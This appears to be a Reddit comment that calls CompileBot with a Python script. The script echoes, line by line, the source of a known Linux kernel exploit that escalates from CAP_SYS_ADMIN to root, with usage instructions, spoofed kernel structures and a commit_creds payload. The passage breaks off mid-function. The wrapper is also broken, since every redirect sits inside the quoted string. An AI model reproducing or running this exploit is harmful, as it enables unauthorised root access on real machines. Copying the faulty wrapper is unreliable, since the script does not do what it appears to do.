+/u/CompileBot python
import os
os.system("rm -f x.c; touch x.c")
os.system("echo '/* > x.c '")
os.system("echo '/* > x.c '")
os.system("echo ' * Linux Kernel CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) > x.c '")
os.system("echo ' * by Joe Sylve > x.c '")
os.system("echo ' * @jtsylve on twitter > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Released: Jan 7, 2011 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Based on the bug found by Dan Rosenberg (@djrbliss) > x.c '")
os.system("echo ' * only loosly based on his exploit http://www.exploit-db.com/exploits/15916/ > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Usage: > x.c '")
os.system("echo ' * gcc -w caps-to-root2.c -o caps-to-root2 > x.c '")
os.system("echo ' * sudo setcap cap_sys_admin+ep caps-to-root2 > x.c '")
os.system("echo ' * ./caps-to-root2 > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Kernel Version >= 2.6.34 (untested on earlier versions) > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * Tested on Ubuntu 10.10 64-bit and Ubuntu 10.10 32-bit > x.c '")
os.system("echo ' * > x.c '")
os.system("echo ' * This exploit takes advantage of the same underflow as the original, > x.c '")
os.system("echo ' * but takes a different approach. Instead of underflowing into userspace > x.c '")
os.system("echo ' * (which doesn\'t work on 64-bit systems and is a lot of work), I underflow > x.c '")
os.system("echo ' * to some static values inside of the kernel which are referenced as pointers > x.c '")
os.system("echo ' * to userspace. This method is pretty simple and seems to be reliable. > x.c '")
os.system("echo ' */ > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#include <stdio.h> > x.c '")
os.system("echo '#include <sys/socket.h> > x.c '")
os.system("echo '#include <errno.h> > x.c '")
os.system("echo '#include <string.h> > x.c '")
os.system("echo '#include <sys/mman.h> > x.c '")
os.system("echo '#include <unistd.h> > x.c '")
os.system("echo ' > x.c '")
os.system("echo '// Skeleton Structures of the Kernel Structures we\'re going to spoof > x.c '")
os.system("echo 'struct proto_ops_skel { > x.c '")
os.system("echo ' int family; > x.c '")
os.system("echo ' void *buffer1[8]; > x.c '")
os.system("echo ' int (*ioctl)(void *, int, long); > x.c '")
os.system("echo ' void *buffer2[12]; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'struct phonet_protocol_skel { > x.c '")
os.system("echo ' void *ops; > x.c '")
os.system("echo ' void *prot; > x.c '")
os.system("echo ' int sock_type; > x.c '")
os.system("echo '}; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#ifdef __x86_64__ > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#define SYM_NAME \"local_port_range\" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x0000007f00000040 > x.c '")
os.system("echo '#define SYM_OFFSET 0x0 > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'typedef int (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#else //32-bit > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#define SYM_NAME \"pn_proto\" > x.c '")
os.system("echo '#define SYM_ADDRESS 0x4e4f4850 > x.c '")
os.system("echo '#define SYM_OFFSET 0x90 > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); > x.c '")
os.system("echo 'typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); > x.c '")
os.system("echo ' > x.c '")
os.system("echo '#endif > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' > x.c '")
os.system("echo '_commit_creds commit_creds; > x.c '")
os.system("echo '_prepare_kernel_cred prepare_kernel_cred; > x.c '")
os.system("echo ' > x.c '")
os.system("echo 'int getroot(void * v, int i, long l) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' commit_creds(prepare_kernel_cred(0)); > x.c '")
os.system("echo ' return 0; > x.c '")
os.system("echo '} > x.c '")
os.system("echo ' > x.c '")
os.system("echo '/* thanks spender... */ > x.c '")
os.system("echo 'unsigned long get_kernel_sym(char *name) > x.c '")
os.system("echo '{ > x.c '")
os.system("echo ' FILE *f; > x.c '")
os.system("echo ' unsigned long addr; > x.c '")
os.system("echo ' char dummy; > x.c '")
os.system("echo ' char sname[512]; > x.c '")
os.system("echo ' int ret; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' char command[512]; > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' sprintf(command, \"grep \\"%s\\" /proc/kallsyms\", name); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' f = popen(command, \"r\"); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' while(ret != EOF) { > x.c '")
os.system("echo ' ret = fscanf(f, \"%p %c %s\n\", (void **) &addr, &dummy, sname); > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if (ret == 0) { > x.c '")
os.system("echo ' fscanf(f, \"%s\n\", sname); > x.c '")
os.system("echo ' continue; > x.c '")
os.system("echo ' } > x.c '")
os.system("echo ' > x.c '")
os.system("echo ' if (!strcmp(name, sname)) { > x.c '")
os.system("echo ' > x.c '")